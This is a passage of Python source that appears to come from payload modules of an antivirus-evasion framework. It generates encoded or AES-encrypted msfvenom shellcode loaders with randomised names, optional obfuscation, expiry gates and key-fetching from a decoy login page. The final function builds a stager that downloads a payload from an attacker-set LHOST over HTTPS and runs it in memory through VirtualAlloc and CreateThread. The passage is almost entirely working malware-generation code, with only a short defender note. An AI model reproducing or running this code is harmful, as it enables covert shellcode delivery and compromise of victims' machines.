                PayloadCode += '\t' + 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
        # Reached only when INJECT_METHOD is not "virtual" (every branch above returns).
        if self.required_options["INJECT_METHOD"][0].lower() == "heap":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Base64 Encode Shellcode
                EncodedShellcode = base64.b64encode(Shellcode)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandT = helpers.randomString()
                HeapVar = helpers.randomString()

                # Emitted program: private executable heap sized to twice the
                # shellcode length, then the same copy/thread/wait sequence.
                PayloadCode = 'import ctypes as avlol\n'
                PayloadCode += 'import base64\n'
                PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
                PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
                PayloadCode += HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
                PayloadCode += RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                # (same "YY-MM-DD" slicing as in the "virtual" expiring branch).
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(
                    days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Base64 Encode Shellcode
                EncodedShellcode = base64.b64encode(Shellcode)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandT = helpers.randomString()
                HeapVar = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # Heap sequence under the date gate.
                PayloadCode = 'import ctypes as avlol\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[
                    2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
                PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
                PayloadCode += '\t' + HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
                PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        else:
            # Any other INJECT_METHOD value: pure-ctypes variant with no kernel32
            # calls; the buffer is cast to a function pointer and invoked directly.
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names (RandReverseShell is unused here)
                ShellcodeVariableName = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()
                DecodedShellcode = helpers.randomString()

                # Base64 Encode Shellcode
                EncodedShellcode = base64.b64encode(Shellcode)

                PayloadCode = 'from ctypes import *\n'
                PayloadCode += 'import base64\n'
                PayloadCode += ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
                PayloadCode += DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
                PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
                PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += RandShellcode + '()'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                # (same "YY-MM-DD" slicing as in the other expiring branches).
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(
                    days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names (RandReverseShell is unused here)
                ShellcodeVariableName = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()
                DecodedShellcode = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # Base64 Encode Shellcode
                EncodedShellcode = base64.b64encode(Shellcode)

                # Pure-ctypes sequence under the date gate.
                PayloadCode = 'from ctypes import *\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[
                    2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
                PayloadCode += '\t' + DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
                PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
                PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += '\t' + RandShellcode + '()'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
    def generate(self):
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
            target_html_file = str(TARGET_SERVER.split('/')[-1])
            USER_AGENT = "'User-agent', '" + self.required_options[
                'USER_AGENT'][0]

            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate(self.required_options)

            # Generate Random Variable Names
            ShellcodeVariableName = helpers.randomString()
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            RandDecodeAES = helpers.randomString()
            RandCipherObject = helpers.randomString()
            RandDecodedShellcode = helpers.randomString()
            RandShellCode = helpers.randomString()
            RandPadding = helpers.randomString()

            # Define Random Variable Names for HTTP functions
            RandResponse = helpers.randomString()
            RandHttpKey = helpers.randomString()
            RandMD5 = helpers.randomString()
            RandKeyServer = helpers.randomString()
            RandSleep = helpers.randomString()

            # Define Random Variable Names for HTML Functions
            RandHttpstring = helpers.randomString()

            # Genrate Random HTML code for webserver to host key file

            f = open(
                str(self.required_options["HTML_FILE_PATH"][0]) +
                target_html_file, 'w')
            html_data = """
                <!DOCTYPE html>
                <!--[if IE 8]>
                        <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
                    <![endif]-->
                <!--[if !(IE 8) ]><!-->
                <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head>


                <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post">
                    <p>
                        <label for="user_login">Username<br>
                        <input name="log" id="user_login" class="input" size="20" type="text"></label>
                    </p>
                    <p>
                        <label for="user_pass">Password<br>
                    <input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label>
                    </p>
                        <p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p>
                    <p class="submit">
                        <input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit">
                        <input name="redirect_to" value="http://www.google.com" type="hidden">
                        <input name="testcookie" value="1" type="hidden">
                    </p>
                    </form>

                <p id="nav">
                <a rel="nofollow" href="http://www.google.com">Register</a> |   <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a>
                </p>


                    <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p>

                    </div>

                        <div class="clear"></div>


                    </body></html>
                """
            html_data += '<!--' + RandHttpstring + '-->'
            html_data = str(html_data)
            f.write(html_data)
            f.close()

            # encrypt the shellcode and grab the HTTP-Md5-Hex Key from new function
            (EncodedShellcode, secret) = encryption.encryptAES_http_request(
                Shellcode, html_data)

            # Create Payload code
            PayloadCode = 'import ctypes\n'
            PayloadCode += 'from Crypto.Cipher import AES\n'
            PayloadCode += 'import base64\n'
            PayloadCode += 'import os\n'
            PayloadCode += 'import time\n'
            PayloadCode += 'import md5\n'
            PayloadCode += 'import urllib2\n'
            PayloadCode += 'opener = urllib2.build_opener()\n'
            PayloadCode += 'opener.addheaders' + ' = ' '[(' + USER_AGENT + '\')]' '\n'
            # Define Target Server "Key hosting server"
            PayloadCode += RandKeyServer + ' = ' '"' + TARGET_SERVER + '"' '\n'
            PayloadCode += 'while True:\n'
            PayloadCode += ' try:\n'
            # Open Target Server with HTTP GET request
            PayloadCode += '  ' + RandResponse + '= opener.open(' + RandKeyServer + ') \n'
            # Check to see if server returns a 200 code or if not its most likely a 400 code
            PayloadCode += '  if ' + RandResponse + '.code == 200:\n'
            # Opening and requesting HTML from Target Server
            PayloadCode += '   ' + RandHttpKey + ' = opener.open(' + RandKeyServer + ').read()\n'
            PayloadCode += '   ' + RandMD5 + ' = md5.new()\n'
            PayloadCode += '   ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n'
            # Genrate MD5 hash of HTML on page
            PayloadCode += '   ' + RandMD5 + '.update(' + RandHttpKey + ')\n'
            # Convert to 16 Byte Hex for AES functions
            PayloadCode += '   ' + RandHttpKey + ' = ' + RandMD5 + '.hexdigest()\n'
            # Convert to String for functions
            PayloadCode += '   ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n'
            # Break out to decryption
            PayloadCode += '   break\n'
            # At any point it fails you will be in sleep for supplied time
            PayloadCode += ' except URLError, e:\n'
            PayloadCode += '  time.sleep(' + self.required_options[
                "SLEEP_TIME"][0] + ')\n'
            PayloadCode += '  pass\n'
            # Execute Shellcode inject
            PayloadCode += RandPadding + ' = \'{\'\n'
            PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
            PayloadCode += RandCipherObject + ' = AES.new(' + RandHttpKey + ')\n'
            PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
            PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
            PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
            PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
            PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

            if self.required_options["USE_PYHERION"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)

            return PayloadCode

        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
            TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
            target_html_file = str(TARGET_SERVER.split('/')[-1])
            USER_AGENT = "User-Agent: " + self.required_options['USER_AGENT'][0]

            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate(self.required_options)

            # Generate Random Variable Names
            ShellcodeVariableName = helpers.randomString()
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            RandDecodeAES = helpers.randomString()
            RandCipherObject = helpers.randomString()
            RandDecodedShellcode = helpers.randomString()
            RandShellCode = helpers.randomString()
            RandPadding = helpers.randomString()
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()
            HeapVar = helpers.randomString()

            # Define Random Variable Names for HTTP functions
            RandResponse = helpers.randomString()
            RandHttpKey = helpers.randomString()
            RandMD5 = helpers.randomString()
            RandKeyServer = helpers.randomString()
            RandSleep = helpers.randomString()

            # Define Random Variable Names for HTML Functions
            RandHttpstring = helpers.randomString()

            # Genrate Random HTML code for webserver to host key file

            f = open(
                str(self.required_options["HTML_FILE_PATH"][0]) +
                target_html_file, 'w')
            html_data = """
                <!DOCTYPE html>
                <!--[if IE 8]>
                        <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
                    <![endif]-->
                <!--[if !(IE 8) ]><!-->
                <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head>


                <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post">
                    <p>
                        <label for="user_login">Username<br>
                        <input name="log" id="user_login" class="input" size="20" type="text"></label>
                    </p>
                    <p>
                        <label for="user_pass">Password<br>
                    <input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label>
                    </p>
                        <p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p>
                    <p class="submit">
                        <input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit">
                        <input name="redirect_to" value="http://www.google.com" type="hidden">
                        <input name="testcookie" value="1" type="hidden">
                    </p>
                    </form>

                <p id="nav">
                <a rel="nofollow" href="http://www.google.com">Register</a> |   <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a>
                </p>


                    <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p>

                    </div>

                        <div class="clear"></div>


                    </body></html>
                """
            html_data += '<!--' + RandHttpstring + '-->'
            html_data = str(html_data)
            f.write(html_data)
            f.close()

            # encrypt the shellcode and grab the randomized key
            (EncodedShellcode, secret) = encryption.encryptAES_http_request(
                Shellcode, html_data)

            # Create Payload code
            PayloadCode = 'import ctypes\n'
            PayloadCode += 'from Crypto.Cipher import AES\n'
            PayloadCode += 'import base64\n'
            PayloadCode += 'import os\n'
            PayloadCode += 'import time\n'
            PayloadCode += 'import md5\n'
            PayloadCode += 'import urllib2\n'
            PayloadCode += 'opener = urllib2.build_opener()\n'
            PayloadCode += 'opener.addheaders' + ' = ' '"' + USER_AGENT + '"' '\n'
            # Define Target Server "Key hosting server"
            PayloadCode += RandKeyServer + ' = ' '"' + TARGET_SERVER + '"' '\n'
            PayloadCode += 'while True:\n'
            PayloadCode += ' try:\n'
            # Open Target Server with HTTP GET request
            PayloadCode += '  ' + RandResponse + '= opener.open(' + RandKeyServer + ') \n'
            # Check to see if server returns a 200 code or if not its most likely a 400 code
            PayloadCode += '  if ' + RandResponse + '.code == 200:\n'
            # Opening and requesting HTML from Target Server
            PayloadCode += '   ' + RandHttpKey + ' = opener.open(' + RandKeyServer + ').read()\n'
            PayloadCode += '   ' + RandMD5 + ' = md5.new()\n'
            PayloadCode += '   ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n'
            # Genrate MD5 hash of HTML on page
            PayloadCode += '   ' + RandMD5 + '.update(' + RandHttpKey + ')\n'
            # Convert to 16 Byte Hex for AES functions
            PayloadCode += '   ' + RandHttpKey + ' = ' + RandMD5 + '.hexdigest()\n'
            # Convert to String for functions
            PayloadCode += '   ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n'
            # Break out to decryption
            PayloadCode += '   break\n'
            # At any point it fails you will be in sleep for supplied time
            PayloadCode += ' except URLError, e:\n'
            PayloadCode += '  time.sleep(' + self.required_options[
                "SLEEP_TIME"][0] + ')\n'
            PayloadCode += '  pass\n'
            # Execute Shellcode inject
            PayloadCode += RandPadding + ' = \'{\'\n'
            PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
            PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
            PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
            PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
            PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
            PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
            PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
            PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

            if self.required_options["USE_PYHERION"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)

            return PayloadCode

        else:
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
                TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
                target_html_file = str(TARGET_SERVER.split('/')[-1])
                USER_AGENT = "User-Agent: " + self.required_options[
                    'USER_AGENT'][0]
                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()

                # Define Random Variable Names for HTTP functions
                RandResponse = helpers.randomString()
                RandHttpKey = helpers.randomString()
                RandMD5 = helpers.randomString()
                RandKeyServer = helpers.randomString()
                RandSleep = helpers.randomString()

                # Define Random Variable Names for HTML Functions
                RandHttpstring = helpers.randomString()

                # Genrate Random HTML code for webserver to host key file

                f = open(
                    str(self.required_options["HTML_FILE_PATH"][0]) +
                    target_html_file, 'w')
                html_data = """
                <!DOCTYPE html>
                <!--[if IE 8]>
                        <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
                    <![endif]-->
                <!--[if !(IE 8) ]><!-->
                <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head>


                <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post">
                    <p>
                        <label for="user_login">Username<br>
                        <input name="log" id="user_login" class="input" size="20" type="text"></label>
                    </p>
                    <p>
                        <label for="user_pass">Password<br>
                    <input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label>
                    </p>
                        <p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p>
                    <p class="submit">
                        <input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit">
                        <input name="redirect_to" value="http://www.google.com" type="hidden">
                        <input name="testcookie" value="1" type="hidden">
                    </p>
                    </form>

                <p id="nav">
                <a rel="nofollow" href="http://www.google.com">Register</a> |   <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a>
                </p>


                    <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p>

                    </div>

                        <div class="clear"></div>


                    </body></html>
                """
                html_data += '<!--' + RandHttpstring + '-->'
                html_data = str(html_data)
                f.write(html_data)
                f.close()

                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode,
                 secret) = encryption.encryptAES_http_request(
                     Shellcode, html_data)

                # Create Payload code
                PayloadCode = 'from ctypes import *\n'
                PayloadCode += 'from Crypto.Cipher import AES\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'import os\n'
                PayloadCode += 'import time\n'
                PayloadCode += 'import md5\n'
                PayloadCode += 'import urllib2\n'
                PayloadCode += 'opener = urllib2.build_opener()\n'
                PayloadCode += 'opener.addheaders' + ' = ' '"' + USER_AGENT + '"' '\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                # Define Target Server "Key hosting server"
                PayloadCode += RandKeyServer + ' = ' '"' + TARGET_SERVER + '"' '\n'
                PayloadCode += 'while True:\n'
                PayloadCode += ' try:\n'
                # Open Target Server with HTTP GET request
                PayloadCode += '  ' + RandResponse + '= opener.open(' + RandKeyServer + ') \n'
                # Check to see if server returns a 200 code or if not its most likely a 400 code
                PayloadCode += '  if ' + RandResponse + '.code == 200:\n'
                # Opening and requesting HTML from Target Server
                PayloadCode += '   ' + RandHttpKey + ' = opener.open(' + RandKeyServer + ').read()\n'
                PayloadCode += '   ' + RandMD5 + ' = md5.new()\n'
                PayloadCode += '   ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n'
                # Genrate MD5 hash of HTML on page
                PayloadCode += '   ' + RandMD5 + '.update(' + RandHttpKey + ')\n'
                # Convert to 16 Byte Hex for AES functions
                PayloadCode += '   ' + RandHttpKey + ' = ' + RandMD5 + '.hexdigest()\n'
                # Convert to String for functions
                PayloadCode += '   ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n'
                # Break out to decryption
                PayloadCode += '   break\n'
                # At any point it fails you will be in sleep for supplied time
                PayloadCode += ' except URLError, e:\n'
                PayloadCode += '  time.sleep(' + self.required_options[
                    "SLEEP_TIME"][0] + ')\n'
                PayloadCode += '  pass\n'
                PayloadCode += RandPadding + ' = \'{\'\n'
                PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
                PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
                PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
                PayloadCode += ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n'
                PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
                PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += RandShellcode + '()'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
    def generate(self):
        """Build Python 2 source for a stager that fetches data over HTTPS and runs it in memory.

        Inputs come from ``self.required_options``: ``LHOST`` and ``LPORT``
        are baked into the download call, and ``USE_PYHERION`` == ``"y"``
        passes the finished text through ``encryption.pyherion``. Every
        identifier in the generated text comes from ``helpers.randomString()``,
        so the output differs textually between calls.

        Returns:
            The generated program as a string.

        Defender notes (what the emitted program observably does): it requests
        ``https://LHOST:LPORT/<uri>`` with a hard-coded
        ``Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)`` User-Agent, then
        allocates memory with ``VirtualAlloc(..., 0x3000, 0x40)``
        (MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE), copies the response
        body in with ``RtlMoveMemory`` and starts it with ``CreateThread``.
        An RWX allocation followed by a thread start from a Python interpreter
        is the behaviour to alert on.
        """

        payloadCode = "import urllib2, string, random, struct, ctypes, httplib, time\n"

        # Randomised identifiers for every function and variable in the
        # generated text; each helpers.randomString() call is a fresh name.
        sumMethodName = helpers.randomString()
        checkinMethodName = helpers.randomString()

        randLettersName = helpers.randomString()
        randLetterSubName = helpers.randomString()
        randBaseName = helpers.randomString()

        downloadMethodName = helpers.randomString()
        hostName = helpers.randomString()
        portName = helpers.randomString()
        requestName = helpers.randomString()
        tName = helpers.randomString()

        injectMethodName = helpers.randomString()
        dataName = helpers.randomString()
        byteArrayName = helpers.randomString()
        ptrName = helpers.randomString()
        bufName = helpers.randomString()
        handleName = helpers.randomString()
        data2Name = helpers.randomString()
        proxy_var = helpers.randomString()
        opener_var = helpers.randomString()

        # helper method that returns the sum of all ord values in a string % 0x100
        payloadCode += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" %(sumMethodName)

        # method that builds the request URI: a random 3-character base plus one
        # more character, chosen so the byte-sum helper above returns 92
        # (presumably the handler's URI checksum); up to 64 attempts, and the
        # method returns None if none of them hits 92
        payloadCode += "def %s():\n\tfor x in xrange(64):\n" %(checkinMethodName)
        payloadCode += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" %(randBaseName)
        payloadCode += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" %(randLettersName)
        payloadCode += "\t\tfor %s in %s:\n" %(randLetterSubName, randLettersName)
        payloadCode += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" %(sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName)

        # method that connects to a host/port over https and downloads the hosted data;
        # it installs a urllib2.ProxyHandler() opener, returns the body only when
        # Content-Length exceeds 100000 (or when the header is missing), and
        # returns '' on URLError
        payloadCode += "def %s(%s,%s):\n" %(downloadMethodName, hostName, portName)
        payloadCode += "\t" + proxy_var + " = urllib2.ProxyHandler()\n"
        payloadCode += "\t" + opener_var + " = urllib2.build_opener(" + proxy_var + ")\n"
        payloadCode += "\turllib2.install_opener(" + opener_var + ")\n"
        payloadCode += "\t%s = urllib2.Request(\"https://%%s:%%s/%%s\" %%(%s,%s,%s()), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n" %(requestName, hostName, portName, checkinMethodName)
        payloadCode += "\ttry:\n"
        payloadCode += "\t\t%s = urllib2.urlopen(%s)\n" %(tName, requestName)
        payloadCode += "\t\ttry:\n"
        payloadCode += "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" %(tName, tName)
        payloadCode += "\t\t\telse: return ''\n"
        payloadCode += "\t\texcept: return %s.read()\n" % (tName)
        payloadCode += "\texcept urllib2.URLError, e: return ''\n"

        # method to inject a reflective .dll into memory: VirtualAlloc with
        # 0x3000/0x40 (commit+reserve, PAGE_EXECUTE_READWRITE), RtlMoveMemory,
        # CreateThread, then WaitForSingleObject(-1) blocks on the thread
        payloadCode += "def %s(%s):\n" %(injectMethodName, dataName)
        payloadCode += "\tif %s != \"\":\n" %(dataName)
        payloadCode += "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName)
        payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)), ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(ptrName, byteArrayName)
        payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(bufName, byteArrayName, byteArrayName)
